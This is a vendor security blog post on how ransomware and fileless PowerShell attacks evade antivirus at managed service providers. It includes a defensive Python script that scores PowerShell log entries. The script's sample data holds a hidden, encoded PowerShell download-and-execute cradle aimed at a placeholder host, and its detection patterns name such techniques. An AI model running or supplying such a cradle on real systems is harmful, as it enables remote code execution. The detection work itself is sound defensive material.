How AV and Endpoint Security Are Failing MSPs in Defending against Attacks

Cristian Iordache

March 20, 2019


Recent attacks on MSPs have confirmed once again that both managed service providers and customers are increasingly targeted by cybercriminals, and the attacks often succeed.

While a lack of patching and of additional controls such as MFA can leave the back door open for attackers, ineffective AV and endpoint protection let criminals walk in through the front door unhindered. This was apparently the case for MSPs that had not patched a known vulnerability and found their customers infected with GandCrab ransomware. In most of these cases, the AV did not detect or stop the attacks, and it was not possible to restore files from unencrypted copies.

Although the discussion often gravitates towards extra measures MSPs can take, it’s worth seriously considering the efficacy of each layer in the security stack, and not just the number of layers. While no AV can stop all attacks, a product with high efficacy in stopping even unknown malware can turn a potentially crippling ransomware attack into a report saying the attack was thwarted.

How do ransomware and other attacks bypass antimalware protection?


  • They use application exploits to gain full control over systems

By taking advantage of unpatched vulnerabilities in the code of legitimate, trusted applications, attackers can run their own scripts without the antimalware product being able to identify the malicious payload. Once they gain control, they can refine their attack and leverage remote scripting, deactivating protection or continuing to tweak ransomware or other payloads until they are no longer detected. Even when the attacker has full control over the system, an AV detection could still warn the MSP of the breach before the objective is completed.


  • They target MSPs directly to gain remote access to customers

MSPs make good targets for attackers, as compromising an MSP's remote IT support software effectively grants access to the computers of hundreds of customers. The lack of a mature security management process and of effective layered security means attackers' effort is low and their reward is high.


  • They constantly customize ransomware scripts and behavior and try to deactivate protection

Malware files and behaviors are tweaked constantly, and most AV products can't recognize the modified versions, so the encryption process is allowed to start. Even if it is allowed to run at first, though, ransomware can still be stopped once malicious behavior is recognized. Here again, because the behaviors are altered, most AV solutions can't keep up and fail to detect and stop the processes.


  • They use script-based attacks

By leveraging legitimate scripting tools such as PowerShell, attackers bypass malware scanning because no file is written to disk. In this case, the whole attack takes place in memory, and most AV tools are not able to scan and identify malicious remote commands.
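Because nothing touches disk, the defender's remaining visibility into this kind of attack is the script itself as recorded by PowerShell script block logging (Event ID 4104), which this example assumes is enabled. The following added example (not code from the original post or from Bitdefender) triages constructed 4104 script block texts: it decodes `-EncodedCommand` arguments and scores a handful of common indicators of in-memory, remotely sourced command execution; the indicator names, patterns and weights are this example's own choices.

```python
import base64
import re

# Defender-side indicators commonly checked in PowerShell script block logs
# (Event ID 4104). The names, patterns and weights are this example's own.
INDICATORS = {
    "in_memory_execution": (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), 2),
    "remote_download": (re.compile(r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest", re.I), 2),
    "encoded_payload": (re.compile(r"FromBase64String|-EncodedCommand\b|\s-enc?\s", re.I), 1),
    "hidden_window": (re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I), 1),
    "no_profile": (re.compile(r"-NoP(?:rofile)?\b", re.I), 1),
}
ENCODED_CMD = re.compile(r"-(?:EncodedCommand|enc?|ec)\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand_encoded_commands(script: str) -> str:
    """Append the UTF-16LE-decoded body of any -EncodedCommand blob so hidden indicators are matchable."""
    decoded = []
    for blob in ENCODED_CMD.findall(script):
        try:
            decoded.append(base64.b64decode(blob).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; scan the raw text only
    return script + "".join("\n" + d for d in decoded)

def score_script_block(script: str) -> tuple:
    """Return (score, matched indicator names) for one script block."""
    text = expand_encoded_commands(script)
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[h][1] for h in hits), hits

def triage(events: list, threshold: int = 3) -> list:
    """Flag events whose combined indicator weight reaches the threshold."""
    flagged = []
    for ev in events:
        score, hits = score_script_block(ev["script"])
        if score >= threshold:
            flagged.append({"id": ev["id"], "score": score, "indicators": hits})
    return flagged

def _b64_utf16le(s: str) -> str:
    return base64.b64encode(s.encode("utf-16le")).decode("ascii")

# Constructed sample 4104 script block texts, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"},
    {"id": 2, "script": "powershell.exe -NoP -W Hidden -EncodedCommand "
              + _b64_utf16le("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"id": 3, "script": "Invoke-Expression ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))"},
]
```

Run `triage(SAMPLE_EVENTS)` to see events 2 and 3 flagged; the encoded blob in event 2 only scores because it is decoded before matching.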

With attacks intensifying and customers being breached, MSPs should reconsider their security, look at independent reviews and opt for tools that have proven superior efficacy and include advanced layers of protection such as anti-exploit and protection against fileless attacks.





Cristian Iordache is a CISSP and Principal Product Marketing Manager at Bitdefender and has spent more than a decade helping organizations address cybersecurity challenges. He loves to highlight security tips and technologies that are proven to improve security operations efficiency and effectiveness against the most elusive attacks.
